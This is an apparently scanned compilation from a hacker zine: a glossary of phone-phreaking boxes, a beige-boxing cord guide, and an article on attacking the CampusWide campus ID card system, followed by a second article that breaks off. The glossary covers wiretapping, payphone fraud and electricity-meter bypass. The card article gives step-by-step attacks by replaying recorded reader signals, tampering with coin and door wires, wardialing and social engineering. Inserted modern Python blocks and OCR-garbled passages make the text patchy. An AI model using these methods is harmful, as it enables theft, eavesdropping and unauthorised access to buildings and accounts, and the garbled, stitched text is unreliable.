Paisley Box. A multipurpose box that combines the functions of several boxes, including blue, beige, and blotto. Among other things can seize operator lines and remotely control all TSPS and TOPS consoles. By Blade of the Neon Fuckeaf Knights.

Pandora Box. A device that generates a high intensity sound to produce pain. A similar device (usually called "phasor") is commonly sold in security shops for personal defense. By Dr. Rat of Rat Labs, S.F, CA. Year: 1986.

[Party Box] [similar to Brown Box, Three Box, Con Box]. This box allows free Three-Way calling, connects two phone conversations at once, without any static or excess wiring, or even having two phone lines. Created by Greyhawke of The Dark Knights (TDK).

Pearl Box [similar to Pearl Box 2 - Advanced Pearl Box]. This is a box that may substitute for many boxes which produce tones in hertz. The Pearl Box when operated correctly can produce tones from 1-9999Hz. As you can see, 2600, 1633, 1336, and other crucial tones are obviously in its sound spectrum (yet you'd need two Pearl Boxes to generate combined tones, such as the ones of the dialpad). Created by Dr. D-Code. Year: before 1989.

[Pearl Box 2 - Advanced Pearl Box] [similar 
to Pearl Box]. A Pearl Box made in an easier and 
cheaper way. Created and Tested by Dispater. 
Date: July 1 1989. 

Pink Box. Allows you to hook two separate phone lines together to have Three-Way calling with hold on either line, as well as bringing a dial tone into the conversation with someone and allowing them to dial the number with touch tones so it will connect Three-Way. When they hang up, it will disconnect Three-Way calling. No more need to play with the hook for Three-Way.

Pink Box (2) [similar to Music Box]. The function of a "Pink Box" is to add a hold button that allows music or anything else to be played into the telephone while the person is on hold. This modification can either be done right in the telephone or as a separate box. This kind of box can be commonly found in a phone shop.

Plaid Box. Turns a pulse phone line into a touch phone capable line.

(Portable Gray Box) (another name for the Gray Box). See Portable Silver Box.

Portable Silver Box (aka Portable Gray Box). A batteries-operated Silver Box that can fit in a pocket for use in payphones or wherever. By The Phone Phantom.

[Power Box] [similar to Tron Box]. The power box is a simple device that will allow you to completely bypass the meter-reading equipment of the power company. It works by connecting the power line running into your house directly instead of through the meter (which records electricity usage for the power company). When implemented correctly, there is no possible way that you can be detected by the power company and therefore save many hundreds of dollars through its use. Not a phreak box. Concept and Plans by Cursor. Date: August 9 1990.

Puce Box. This box emits vaporous LSD. Line 
noise may cause strychnine formation. 

Purple Box. This box allows switching between two phone lines, putting one of them on hold. A LED shows which line is on hold. Created by The Flash. Date: February 26 1956.

Rainbow Box [non selective version of the Bottle-Nosed Gray box]. Connects the electric line to the phone line blowing up everything. Odds are you will take out every phone in the neighborhood and get caught. By The Dolphin that came from Belmont.

Razz Box. This box allows you to tap your neighbor's line without your neighbor knowing it. You can also make free phone calls. Written by The Razz and released by The Magnet of Crime Ring International. Date: November 12 1988.

(Record-o-Box) (another name for the Neon 
Box). See Neon Box. 

Red Box [similar to the Red Box Whistle]. The Red Box basically simulates the sounds of coins being dropped into the coin slot of a payphone. The traditional Red Box consists of a pair of Wien-bridge oscillators with the timing controlled by 555 timer chips.

[Red Box Whistle] [similar to the Red Box]. A phreak in the Midwest has extensively tested a method of red boxing which uses nothing more than a pair of brass or aluminum whistles. This method is very similar to the original blue boxing as it was discovered by Cap'n Crunch. Reported by The Researcher.

Red Green Box [combines a Red Box and a Green Box]. This is a device that generates the tones for red boxing and green boxing. By Pink Panther.

Ring/Busy Box. When connected to a phone 
line, this box will cause a busy signal anytime a 
call is made to that particular line. They can still 
use their phone to make outgoing calls. By 
MOrtaSkuld. 

[Rock Box - Basic] [similar to the Rock Box - Advanced, Neon Box, Sound Blaster Box]. The Rock Box channels the music from the stereo out to the phone line via the headphone output. It also can record conversations. Created and designed by Video Vindicator of the Shadows of IGA.

[Rock Box - Advanced] [similar to the Rock Box - Basic, Neon Box, Sound Blaster Box]. The Rock Box channels the music from the stereo out to the phone line via the headphone output. It also can record conversations. The Advanced version has more complex wiring and better audio quality. Created and designed by Video Vindicator of the Shadows of IGA.

Sand Box. Usage unknown. Cited in the Crimson Box document. By Dr. D-Code. Year: 1985 or 1986.

[Scarlet Box] [similar to the Noise Box]. The purpose of a Scarlet Box is to create a very bad connection. It can be used to crash a BBS or just make life miserable for those you seek revenge upon. Written and created by The Pimp.

Servo Box. Uses R/C car servos to change lines in poles outside of house. This could be a nice idea, but very expensive and hard to do.

Silver Box (aka Gray Box) [similar to Solid State Silver Box]. The silver box transforms keys 3, 6, 9, # to special keys A, B, C, D.

[Slug Box] [similar to the Neon Box]. A slug box is a recording box that stops and starts the tape recorder when a connection is made. Date: May 14 1990, 10:18 pm.

Snow Box. An underground television transmitter built using commercially available parts. Not a phreak box. Date: June 13 1988.

Solid State Silver Box (can be shortened as SSSilver Box) [similar to Silver Box]. This box uses an integrated circuit to generate the tones rather than converting a phone keypad.

(SSSilver Box) (short name for the Solid State Silver Box). See Solid State Silver Box.

[Sound Blaster Box] [similar to Neon Box, Rock Box]. A device that adds a normal jack interface to a telephone, allowing the sending of music or tones into the phone line, or the recording of conversations using the microphone input of a recorder. Better than a Neon Box. By ShadowHawk. Date: March 31 1994.

Static Box. This box keeps the voltage regulated so that you can avoid static. This allows a more stable line for high speed modems (which at the time meant 2400bps). In a certain way it's the opposite of boxes like the Noise Box. Created by The Usurper and The Raver of the Lords of Twilight. Date: Originally released on November 21 1986. Second release on December 27 1987.

Switch Box. With the Switch Box you can put one or both phone lines on hold with visible indicators of each line's status, conference call with two people, change a phone from line 1 to line 2 and lastly, make one phone line physically dead to the outside world. By Autopsy Saw.

Sword Box. The sword box is just essentially a Bud/Beige/Day-Glo Box with enhancements and modifications. The structural differences in the Sword Box make it better however, and thus safer for you to use. By Grim Reaper/STS. Date: November 22 1987.

Tan Box (it's not the short name of the Tangerine Box, which is a different box). It allows you to make recordings from a phone line, and it will only record once the victim's phone is picked up. It's like a Neon Box combined with a Beige Box.

Tan Box (2) (it's not the short name of the Tangerine Box, which is a different box). It serves as a phone ringer. You have two choices for ringers: a piezoelectric transducer (ringer) or a standard 8 ohm speaker.

(Tanger Box) (short name for the Tangerine Box). See Tangerine Box.

Tangerine Box (can be shortened as Tanger Box. Can't be shortened as Tan Box, which is a different box). Enables you to plug it in, then listen to the conversation, without them hearing a click or anything... plus a jack for headphone, or tape. By Happy Harley.

(Tap Box) (another name for the Lunch Box). See Lunch Box.

[Three Box] [similar to Brown Box, Party Box, Con Box]. Use one line, another line, or both. Like a Con Box, but better because it uses LEDs for which line you are on.

Tron Box [similar to Power Box]. It will put a reverse phase signal on the line and cancel out the other phase and put a reverse phase signal running everything in the house. It should make the electric meter run backwards. Not a phreak box. By Pure Evil.

Urine Box (aka Zap Box). It basically creates a capacitative disturbance between the ring and tip wires in another's telephone headset. By Wolfgang von Albatross of the Underground Elite. Date: March 2 1986.

V-Box. Detect voltage changes in phone lines 
(used for taps). 

Violet Box. This box allows calls to be made from payphones with just one coin, keeping the line from being released when time is up. The author was going to call this the "Yellow, Violet and Brown Box" but then decided that name was too long so he stuck to just violet because it sounded nice. By The Kez.

White Box. Turns a normal touch tone keypad into a portable unit. This kind of box can be commonly found in a phone shop.

[White Box (2)] [similar to Crimson Box, Green Box (2), Orange Box, Hold Box, Hold On Box, Yellow Box (2)]. A hold button. See Crimson Box.

White Gold Box. A White Box and a Gold Box combined. Created by The Traveler.

Yellow Box. This box can switch a pay phone from working to out of order and vice versa. By Captain Hook. Date: February 3 1986 - 5:47.

[Yellow Box (2)] [similar to Crimson Box, Green Box (2), Orange Box, Hold Box, Hold On Box, White Box (2)]. A hold button. See Crimson Box.

(Zap Box) (another name for the Urine Box). See Urine Box. The scheme and description is the same for the urine box, but it's attributed to another author. By KiLLgOre Tr out [BULgel.

The Bungee Box

by Captain B

The principle and construction of this box is quite simple. You're modifying a phone handset cord for use as a line cord. All you will need for making this is a wire cutter (or wire cutter/stripper) and modular crimp tool. Radio Shack sells both, but you can also find the modular crimp tool at other places that sell phones and phone accessories. Radio Shack sells two different modular crimp tools. The only difference is that the cheaper one ($9, m) has no wire cutter and only crimps RJ11, 14, and 25 (one, two, and three line) modular plugs. The more expensive one ($29.99) has a built in wire cutter and also crimps plugs on RJ45 (four line) modular plugs. As long as you have a wire cutter, you don't need to drop $30 on the more expensive crimp tool.

It should be noted that some phone handset cords have four conductors inside, while others have two. But unless you're going to use a two line phone, the cord won't need to have more than two conductors. Take a phone handset cord and look first at the little wires in the plug to observe the color scheme (thus making note of the correct polarity). Then cut off that handset cord plug. You could do both at once, but you might lose track of the correct polarity. To simplify, do one end of the cord at a time. Try to cut off the plug as close as possible to where it connects to the cord. Take a two line (RJ14) modular line cord plug and crimp it on the handset cord facing the same way as the previous handset cord was. (In other words, if the little spring clip on the handset cord was facing down, crimp the line cord plug on facing the same way as that was.) To crimp, first push the line cord plug over the end of the handset cord as mentioned, then insert that end of the handset cord into the modular crimp tool properly, and squeeze the handles together firmly until it stops (which is quite fast). See the instructions that came with the modular crimp tool if you need more help.

After crimping a line cord plug on one end of the handset cord, you have only to repeat the same process for the other end of the handset cord and you're done. If you messed up on the polarity at either end, it should still work, but keeping polarity correct is the right way. As long as you're careful and work patiently, it's a piece of cake.

I think the bungee box is great for beige boxing purposes, because when phreaking out in the field, you don't want a tangled mess of line cord to have to disconnect and store away when you have to get out of the scene in a hurry. It should be mentioned that another way to accomplish this is to use a retractable line cord. It comes in its own circular case. These can be bought either from Radio Shack for $19.99 or Home Depot for about $15. The one from Radio Shack is 12 feet long, the one from Home Depot is 16 feet long (according to the packages). Have phun.

All credit for the name of this box goes to icOn 
of LPH. 








by Acidus 
CampusWide is the most widely used access system in America today. It sadly is the least secure. CampusWide is an ID card solution originally created by AT&T and now owned by Blackboard. It is an ID card that can be used to purchase things from vending/laundry machines or the college bookstore just like a debit card. It's used to check out books from libraries, open computer labs and buildings at night, gain access to parking decks, and even get you into sporting events. The CampusWide system gives everyone a card that lets them access both unattended and attended card readers and Points of Sale. All these actions and transactions are sent to a central server which stores all the information in a database. A confirm or deny signal is sent back to the card reader.

Back in the day (last ten years), there were two major card systems available to colleges: AT&T's CampusWide system (also known as Optim9000) and Icollege's Envision. Envision was one of the first card systems ever made. The seeds of the current Envision system go all the way back to 1984 with a company called Special Teams. The original engineers from Special Teams went through several companies, each one being bought by another company every year for several years, before they came to Icollege. AT&T saw the market for card systems and jumped into the mix as well, stealing some of the ideas behind the system by hiring developers of Envision away from Icollege. They released a system known as CampusWide. It is commonly called Optim9000 or OneCard, however I will continue to call it by its most well known name, CampusWide. So why do you need to know all this history? Because the core of all modern card systems is based entirely on 1984 technology! The original engineers from Special Team and people trained in their ideas have been the only people in the country designing and building these things. That means that the weaknesses in the reader/server infrastructure that I point out here are found in every card system made in the United States in the last 15 years! By the mid to late 90's CampusWide held the largest market share. Then in November 2000, a newly formed company called Blackboard purchased both Envision and CampusWide. It sells both systems under the names Envision and Optim9000. Blackboard's first order of business was to upgrade the two systems to use newer technology, only to learn that they couldn't! Too many colleges and even businesses had the older equipment and Blackboard couldn't afford to drop compatibility! They have tried to merge older and newer technology in an attempt to improve oido (with the addition of IP r; Ptheyl have weakened an already frail system,

is the most prevalent, and easy to spot. The dps are black metal or plastic, almost all have an LCD screen, and they have no writing on them except for the AT&T logo with the word "AT&T" under it. The newer Blackboard ones work exactly the same as the AT&T ones, only they have Blackboard written on them. Information on the CampusWide system was very hard to find. I started looking right after AT&T sold it when they were clearing out their old webpages and Blackboard was still creating their webpages. Needless to say, AT&T had much better documentation of the specs of the system than Blackboard does. Sadly, all of it is off AT&T's page now and you'll have to hurry to still find it cached on Google. Luckily I saved everything, and should post it up soon.

The Server

The CampusWide system is recommended to run on HP9000 machines, though any RISC processor will do. It only runs on HP-UX (Blackboard currently installs ver 11.x). The AT&T system had a list of specs that the end users had to have to support the software. These included the above, but also a four gig capacity Digital Audio Tape and a UPS that could keep the E up for
minutes). More interestingly, the ek system is required to have a 9600 bps modem for remote diagnostics. The system itself consists of two parts: The Application Processor (AP) and the Network Processor (NP). The Application Processor is the back end of CampusWide, the part the users never see. It manages the database where all the information is stored and provides an interface for human operators to look at logs and run reports, as well as change configuration/privileges and transactions/account maintenance. The NP is the gateway from the infrastructure to the AP. It takes in the requests from readers around campus, converts the mode of communications into commands the AP can understand, and then passes it along. AT&T CampusWide could support up to 60 communication lines and 1000 card readers. The new Blackboard system allows up to 3072 readers.

The Database

All the information about a student or employee isn't stored on the card for security reasons. It's stored in the database (the card simply has an account number which is used to organize the data in the database). The database used by the current anida aan is dbVista. The database for the AT&T version was never advertised by AT&T but was believed to be Informix. However, based on the modular design of CampusWide, I believe any SQL queried relational database should work. The database is most likely not encrypted or protected in any way other than by isolation. The only way to get to it is either at the console of the AP or by the commands sent from card readers that have already passed through the NP. Blackboard's assumption that these two ways of reaching the AP are secure is one of the system's downfalls. The database can store up to 9.999 different accounts, each account having many different fields. The balance the person has and the doors he can open are included in the system. The balance will be a floating point number, and the doors the person can open will most likely be a string of characters, with the bits being used to tell which doors he can or can't open. The doors are most likely grouped into zones, so that the five doors into a building have one bit instead of five separate bits saying whether the person can open those doors or not. This idea is upheld by the fact that Blackboard says the users are given plans and they can be updated regarding their access to buildings. These plans grant different levels of security access to a building. Lower levels can get into the building through all the exits, the next level can access labs on a certain floor, etc. Without direct inspection of the database, only educated guesses can be made about its structure. (I have totally left out any provisions for checking out books and other things the card can do.)

The Workstations

The AP was interfaced originally by the AT&T system only at the server console, or through dumb terminals connected to 19,200 bps serial lines. Toward the end of the AT&T days and now with Blackboard, changes to someone's security privileges can be made from any workstation on campus. I watched this process several times. A certain software package was used to connect through TCP/IP to the AP. (I saw the name once, briefly, and for some reason I thought it was Osiris. Checking on this name has turned up no results. Perhaps this is a proprietary piece of software specific to my college, or simply a closely guarded software package from Blackboard.) A GUI was used to select my name from a list of students. A summary of my security privileges then came up, and the ability to add and remove these was there as well. This GUI was incredibly user friendly, as the man using it had nil computer knowledge. I only got to watch a few people having new security privileges activated, and never got to use it myself, so I have no way of knowing if the debt balance can be accessed/changed from this GUI.

The Card

The ID cards that are used are your standard ANSI CR-50 mag stripe cards. They are made of PVC and are 2.125 by 3.375 inches. They are made on site at the college's "card station," and normally have a photo ID on them. A 300 dpi photo printer is used and the company recommended by Blackboard is Polaroid (just like the printers at the DM). The magnetic stripe on the card is a Standard American Banker Association (ABA) Track 2. Any card reader/capture tool can read these cards. The cards are encoded on high coercivity stripes (known as HiCo), which are very resistant to wear and tear. These cards only use Track 2 of the card which is read only. It is interesting that they don't use Track 3 which is read/write. Track 2's information breakdown is as follows:

Start Sentinel = 1 character
Primary Account Number = up to 19 characters
Separator = 1 character
Country Code = 3 characters
Expiration Date or Separator = 1 or 4 characters
Junk data = fills the card up to 40 characters
LRC (Longitudinal Redundancy Check) = 1 character







As you can see, most of this applies to banks. However, the
account number I have stamped on my CampusWide card is 16
characters long, so the Primary Account number field is known
to be used. CampusWide also allows for lost cards. If a card
is lost, an entry is made in that person's table in the
database, the last digit of the account number is increased
by one (this is called the check digit - so of the 16 digit
account number I have, the first 15 digits are my number; the
16th digit is the check digit). The old card that uses the
old check digit is deactivated and a new card is printed.
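
To make the Track 2 layout above concrete, here is an added example (not from the original article) that decodes a stripe image character by character and checks both the per-character parity and the LRC. The end sentinel `?` and the 5-bit character set come from the ABA/ISO Track 2 layout rather than the article's field list; the 15+1 split of the account number follows the article's description, and the sample card is constructed.

```python
# Added example: decode and validate a Track 2 (ABA) stripe image.
ALPHABET = "0123456789:;<=>?"      # the 16 symbols of the 5-bit Track 2 character set
START, SEP, END = ";", "=", "?"    # sentinels and field separator (ABA/ISO layout)
MAX_CHARS = 40                     # total track length given in the article


def to_code(ch):
    """Encode one character as 4 data bits plus an odd-parity bit (bit 4)."""
    value = ALPHABET.index(ch)
    parity = 0 if bin(value).count("1") % 2 else 1
    return value | (parity << 4)


def from_code(code):
    """Decode one 5-bit code; a flipped bit breaks odd parity and is rejected."""
    if code >> 5 or bin(code).count("1") % 2 != 1:
        raise ValueError(f"parity error in code {code:#04x}")
    return ALPHABET[code & 0x0F]


def lrc(text):
    """Longitudinal check character: XOR of the data nibbles, sentinels included."""
    acc = 0
    for ch in text:
        acc ^= ALPHABET.index(ch)
    return ALPHABET[acc]


def encode_track2(pan, discretionary=""):
    """Build the list of 5-bit codes a read head would deliver for this card."""
    body = START + pan + SEP + discretionary + END
    return [to_code(ch) for ch in body + lrc(body)]


def decode_track2(codes):
    """Return the fields of a stripe image, or raise ValueError on any damage."""
    text = "".join(from_code(c) for c in codes)
    end = text.find(END)
    if (not text.startswith(START) or end < 0
            or len(text) != end + 2 or len(text) > MAX_CHARS):
        raise ValueError("sentinel or length error")
    body, check = text[:end + 1], text[end + 1]
    if lrc(body) != check:
        raise ValueError("LRC mismatch")
    pan, sep, rest = body[1:-1].partition(SEP)
    if not sep or not pan.isdigit() or len(pan) > 19:
        raise ValueError("bad primary account number")
    return {
        "pan": pan,
        "card_id": pan[:-1],       # first 15 of 16 digits, per the article
        "issue_digit": pan[-1],    # the digit the article says is bumped on reissue
        "discretionary": rest,
    }


# Constructed sample card: 16-digit account number plus filler, not real data.
SAMPLE = encode_track2("1234567890123450", "0000000000")
```

Parity catches a single flipped bit inside one character, while the LRC catches a whole character that was misread as another valid one; neither is a security control, since anyone who can write a stripe can recompute both.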

The Infrastructure 

The infrastructure is a "security through obscurity" ploy of
the system. Originally the system was designed to run over
several RS-485 drop lines. (These are the 60 communication
lines mentioned before.) RS-485 is a very robust means of
transmitting data. (The whole CampusWide system is designed
to take a beating.) Unlike RS-232, which has a protocol built
into the standard that says how devices must talk to each
other (stop bits, baud, handshaking, etc.), RS-485 has none
of that. It is a way for a master device that sits at the end
of a communication line to talk to slave devices that are
daisy chained on the line. The CampusWide system uses the
full duplex version of RS-485 where slaves can speak to the
master before the master polls them for data. (CampusWide
needs this to have the sub-second times they advertise.
However, the NP still polls all the readers on a regular
basis and can be interrupted by a reader when a transaction
comes in.) The data lines are very robust against noise and
interference. RS-485 has two lines in each direction, called
A and B. Data is sent by having a difference in the voltage
of A and B of more than five volts. This means that if you
have a signal being sent and A is at 10 volts, B is at 15,
and a power spike comes along, the spike will boost both
voltages by the power of the spike. However, the difference
between the higher power A and B will still be five volts and
the data is not corrupted. Over short distances, speeds of
10Mbit can be achieved. However, the longer the cable is, the
lower the speed. All CampusWide card readers operate at 9600
bps, thus making the maximum distance of the RS-485 drop line
4100 feet at that speed. This can be extended through the use
of repeaters and boosters on the line. RS-485 is very common
in the industry, but "secure" at a college since it is
unlikely anyone would have a means of interfacing to it.
Commercial RS-485 to RS-232 converters are available and
prices range from $50 to a few hundred. VHDL designs of these
converters can be found on the Internet, and thus an FPGA
could be configured to decode RS-485 signals. While
researching I came across a post from someone claiming to be
a field tech for some company. He said that you could make an
RS-485 to RS-232 converter very easily by wiring:

RS-232 Xmit = RS-485 RX
RS-232 Rcvd = RS-485 TX

No one posted after him to say he was wrong. I 
don’t know if it would work, since the second wire 
of the pair of RS-485 data lines isn’t even men- 
tioned, and it’s the difference between these two 
lines that sends the data. Also, the possibility of 
high voltage on an RS-485 line could easily dam- 
age a serial port on a computer, if not fry the moth- 
erboard. Also, this assumes the data scheme used 
to transmit data on the 485 line is identical to RS- 
232. This doesn't have to be true, since the way 
data is represented (in packets, streams, stop bits, 
parity, etc.) is not defined by RS-485. If you could 
get to the data streams, you have no idea what the 
scheme used to represent it is, and thus how to de- 
code it. This last problem however, is moot, as you 
will read in the Exploits section. 

AT&T would recommend that these lines be used (indeed all the
readers can only transmit their data in RS-485 mode), however
the data can travel over any facility from telephone lines to
radio waves, provided that full duplex 9600 bps asynchronous
communication can occur on them. The NP is the part of the
system that would sort all this out. AT&T did however
specifically say that using an existing Ethernet or computer
network was not a good idea, as it sent the data out into the
wild, and would slow down both the CampusWide system and the
existing computer network. However, Blackboard now offers an
IP converter. This device is a simple computer (it has a
Pentium class processor and a standard off the shelf NIC
card) that takes in 16 different RS-485 devices, converts all
their communications into TCP/IP packets, and encrypts them
to send over the network. The NP then has a converter at its
end that converts the packet back to RS-485 format. The IP
converter is assigned an IP address which is most likely a
static address. The IP converter also most likely has a
daemon on it you can telnet into to look at the status and
perhaps change configuration info. Blackboard says the data
from these boxes is encrypted and the box certainly has the
power to crunch some numbers. However, I have found that if
encryption is good, then companies will brag about the key
length, etc. The only data Blackboard gives about the
encryption is that the keys can be changed automatically at
any interval from the AP.

For the longest time at my college if an off-campus food
joint wanted to have the student be able to use their school
cards to pay for food, they had to pay for an expensive
leased line that connected them to the school. It's my guess
that this was the RS-485 line or something similar. Recently
(in the last six months) my college offered cheap (less than
$300) boxes to nearby pizza joints that would allow for
payment with a school card. These boxes were simply card
readers with modems installed, much like a credit card
validator. These modems are dialing the NP directly. Major
security risk!

The infrastructure ends up like this. All the devices in a
building send their lines into one place in the building.
This is where multiplexers are, which split the main RS-485
drop line up into slices for each reader. These multiplexers
also can boost the power of the main drop line, letting it
travel longer distances. They can be stored in a locked
networking closet or in these big metal cabinets on the wall
of a room. AT&T called these MW/MHWMENC - Wall Mount
Enclosures. The metal box has a handle and a lock, but the
front of the handle and lock assembly has four flathead
screws. I used a metal knife and opened this locked box.
Inside I found the LCM (Laundry Center Multiplexer) that
controlled the laundry room I was in. Everything had "AT&T
CampusWide Access Solution" written on it, as well as lots of
Motorola chips. Sadly, this was early in my investigation,
and I haven't gone back to look again.

The drop lines coming to the building can be traced back all
the way to the building that houses the NP. There the NP
interfaces with the AP to approve or deny transactions.

The Readers

Every reader imaginable is available to a college from
Blackboard. Laundry readers, vending machine readers, Point
of Sale (POS) terminals in the campus bookstore, door
readers, elevators, copiers, football game attendance,
everything!!! All of the readers communicate using RS-485
lines, and if any other medium is used between the reader and
the NP (such as TCP/IP networking by way of the IP
converter), it must be converted back to RS-485 at the NP,
since all CampusWide uses that standard. Everything is
backwards compatible. The majority of my college campus has
AT&T readers on them, though a few new Blackboard readers are
showing up.

Readers can be broken into three categories: security, self
vending, and POS.

Security readers are made of high density plastic and consist
of a vertical swipe slot and two LEDs. They are green when
they are not locked and red when they are. When you swipe a
card to open a door you are cleared for, the light will
change to green for around 10 seconds. If the door has not
been opened in that time, it locks again. To allow for
handicapped people who may not be able to get to the door in
time, a proximity sensor is available to receive signals from
a key source to open the door. Information about what
frequencies are used to control the door are obviously not
published by either AT&T or Blackboard. There is also a model
of door reader with both a swipe and a 0-9 keypad for codes.
I have encountered no such model and have no idea how it
works. Advanced forms of these three security readers are
available which have the ability to have a local database of
4,000 (expandable to 16,000) account numbers stored in
NV-RAM. This way if for some reason the card reader can't
reach the NP to confirm someone's identity, then the reader
can check its local records. The tricky bastards also built
the readers so there is no visible difference between a
reader that can't reach the NP and one that can.

The self vending machines are the most colorful group. They
are the best to hack because they are unattended and work
24/7. They vary in size and shape, but all have several
fundamental features. They all have an LCD screen of some
kind, the most common being 2x16 characters. Most are mounted
to walls and the power/data lines are protected by metal
conduit. Coke readers are mounted on a Coke machine where the
dollar bill acceptor would go. Of this group one stands out:
the Value Transfer station! Unlike the GUI at the
workstations, this reader can directly query about the
account balance of the cardholder and add money to it as well
(by feeding in dollar bills like a change machine). In
addition, it dispenses temporary PVC cards that can be
credited, so people can do laundry, etc. if they forget their
card. This means that this station can tell the AP to create
a new account and give it x number of dollars!

Finally there are the POS devices. A student 
would never get to use these. They are used in 
cafeterias and bookstores. They allow for payment 
by the student ID card and several other options. 

All these readers have inherent similarities. Most are made
from high impact plastic or metal. If it is wall mounted,
there will be metal conduit running out of the top which
holds the power and data lines. All have their program code
on ROM/NV-RAM chips. I once managed to power down a card
reader for a copier. When I turned it back on, it ran through
several self tests in the span of a few seconds. I saw
messages on the LCD that said things like "ROM ver" and "CRC
check complete." AT&T and now Blackboard say all the readers,
including POS, will power up to full operating status without
any user input in a maximum of 20 seconds. All of these
readers can store swipes of cards and transactions in their
local NV-RAM until it can reach the NP, and through it, the
AP to confirm the transaction. While disconnected from the
NP, the readers show no warning lights or anything like that.
Some readers, such as the security readers, can be wired to a
UPS to keep areas secure even when the power goes out.

A Simple Transaction 

Let's run through a simple transaction. I am at a laundry
reader. I tell the reader with a key pad which washer I want
to use. Let's say I choose C4. I then swipe my card. The
reader sends a signal that contains the account number (and
the amount of my purchase and most likely nothing more) to
the NP through some medium (most likely it's a straight
RS-485 line, but an IP converter could be installed by the
university). The NP decodes the data out of the RS-485 line
and parses it into commands the AP can understand. The AP
uses the account number to pull up my account and checks the
balance against the amount requested. It then either deducts
the money from my account and tells the NP to send an OK
signal, or to send a deny signal along with the new balance
of my account. The NP forwards the reply back to the reader,
and the reader (if it got an OK signal) sends an electronic
pulse to the coin tester inside the washer C4 and tells it
that 3.50 was received. The washer is retarded - for all it
knows I put 4.50 in it with coins, and it gives me a load.

The Exploits

Did you see the problem with the above scenarios? There are
several ways to cheat the system. If I can record the "it's
OK to sell it to him" signal from the NP to the reader and
play it to the reader again, I will get another load of wash.
Also, if I could get to the wires that go from the Coke
reader to inside the Coke machine that send the coin pulses,
I can make the Coke machine think money has been paid. I have
looked at Coke machines with these Coke readers. Out the back
of them they have an RJ11 jack (though it will have RS-485
signals on it). All I need is a converter and a laptop and I
can trap the signals back and forth between the reader and
the NP. You don't even need to know what the data scheme used
on the RS-485 line is, just send to the reader what you
intercepted from the NP, and it will work. It is even easier
if the traffic takes place over a TCP/IP network. If I learn
the IP address of the IP converter, I can simply send packets
to it from anywhere in the world (provided I can telnet into
the college's TCP/IP network) that contain the RS-485 code to
spit out a Coke! You can fool door readers as well if you can
get to the wires that go from the reader to the magnet
holding the door shut. Just send the correct pulses. This
system is horribly insecure because you can completely bypass
the CampusWide interface! The Value Transfer Stations are
even worse. They have the ability to make the AP create a new
account and set a starting balance of any amount. Just gain
access to the RS-485 lines, record the traffic to and from
the NP while you are getting a temporary card, and you have
the system to create and alter debt accounts.
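
The replay described above succeeds because the reader acts on any approval it hears. As an added example (not from the article and not Blackboard's protocol), the code below shows the standard countermeasure beside the legacy behaviour: the reader puts a fresh nonce in every request and the NP authenticates its answer with an HMAC over the whole exchange. The per-reader shared key, the class names, the reader ID and the account number are all assumptions made for illustration.

```python
import hashlib
import hmac
import json
import secrets


def _tag(key, reader_id, nonce, account, cents, decision):
    """HMAC-SHA256 over every field of the exchange, in an unambiguous encoding."""
    msg = json.dumps([reader_id, nonce, account, cents, decision]).encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


class NetworkProcessor:
    """Stands in for the NP/AP pair: checks the balance and signs its answer."""

    def __init__(self, keys, balances):
        self.keys = keys            # reader_id -> shared secret (assumed provisioning)
        self.balances = balances    # account -> balance in cents

    def authorize(self, req):
        key = self.keys[req["reader_id"]]
        ok = self.balances.get(req["account"], 0) >= req["cents"]
        if ok:
            self.balances[req["account"]] -= req["cents"]
        decision = "OK" if ok else "DENY"
        return {"decision": decision,
                "tag": _tag(key, req["reader_id"], req["nonce"],
                            req["account"], req["cents"], decision)}


class LegacyReader:
    """Behaviour the article describes: any well-formed OK triggers a vend."""

    def complete(self, reply):
        return reply.get("decision") == "OK"


class HardenedReader:
    """Binds each approval to one transaction through a fresh nonce and a MAC."""

    def __init__(self, reader_id, key):
        self.reader_id, self.key = reader_id, key
        self.pending = None

    def begin(self, account, cents):
        self.pending = {"reader_id": self.reader_id,
                        "nonce": secrets.token_hex(16),
                        "account": account, "cents": cents}
        return dict(self.pending)

    def complete(self, reply):
        req, self.pending = self.pending, None   # each nonce is usable once
        if req is None:
            return False                         # unsolicited reply
        expected = _tag(self.key, req["reader_id"], req["nonce"],
                        req["account"], req["cents"], reply.get("decision"))
        if not hmac.compare_digest(expected, str(reply.get("tag", ""))):
            return False                         # forged, altered or replayed
        return reply["decision"] == "OK"


def demo():
    """Run one genuine purchase, then feed the recorded approval back twice."""
    account = "1234567890123450"                 # constructed account number
    key = secrets.token_bytes(32)
    np_ = NetworkProcessor({"laundry-C": key}, {account: 350})
    reader = HardenedReader("laundry-C", key)

    recorded = np_.authorize(reader.begin(account, 350))  # copy seen on the wire
    first = reader.complete(recorded)            # genuine approval: vend

    idle_replay = reader.complete(recorded)      # replay with no swipe pending
    reader.begin(account, 350)                   # new swipe, new nonce
    live_replay = reader.complete(recorded)      # replay during that transaction

    legacy = LegacyReader().complete(recorded)   # the old reader accepts the copy
    return first, idle_replay, live_replay, legacy, np_.balances[account]
```

Because the tag covers the nonce, a recorded approval matches only the transaction it was issued for, so the NP's ledger and the goods dispensed stay in step even when the line itself can be tapped.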

With a system like this, you would think that the RS-485
lines would be protected with massive security. They aren't.
Metal conduit protecting the lines commonly stops at the
hanging ceiling. Value Transfer Stations routinely have their
backs accessible from janitor or utility closets, which are
rarely locked. The 485 line literally comes out of the back
of a Coke machine unprotected. The flexible piping that
carries the coin wires from the laundry reader to the washer
is secured to the back of the washer with flat head screws.
It is pathetically unprotected. The phone numbers the modems
dial from off campus eateries are easily socially engineered
out of the minimum wage workers there, and they let you dial
directly to the NP. Or you could simply find the range of
telephone numbers of the building that the card system is
housed in and wardial it. The AP is required by Blackboard to
have a modem for diagnostics. You could steal a copy of the
GUI off a computer and then edit people's privileges to your
heart's content. And even worse, the Envision system is
exactly the same as CampusWide, except it uses a Windows
NT/2000 machine using Oracle as its database. Every flaw I
mentioned will work against Envision as well. Hell, both
systems even use the same readers! And there is no fear of
having any of your actions logged. Once you trap the RS-485
signals from the NP to the reader, just play it back to the
reader whenever. The AP never knows you are doing anything
and thus doesn't log it, and the reader assumes that any data
it gets must be secure. Now tell me this. The next time you
swipe a CampusWide card to get into a football game, how do
you know someone isn't trapping the data and creating a copy
of your account onto a card from a hacked Value Transfer
Station? Hopefully this article will force Blackboard to
change to a more secure system.

Thanks to Jim at Blackboard for all the technical info, and
various websites like rs485.com, google.com's cached
webpages, and howstuffworks.com.


by The Cheshire Catalyst
cheshire@2600.com

The people running telephone companies (telcos) are such
idiots. Sorry, I really should explain which idiots I'm
talking about since there are so many entities known as
"phone companies" out there these days. In this diatribe I'm
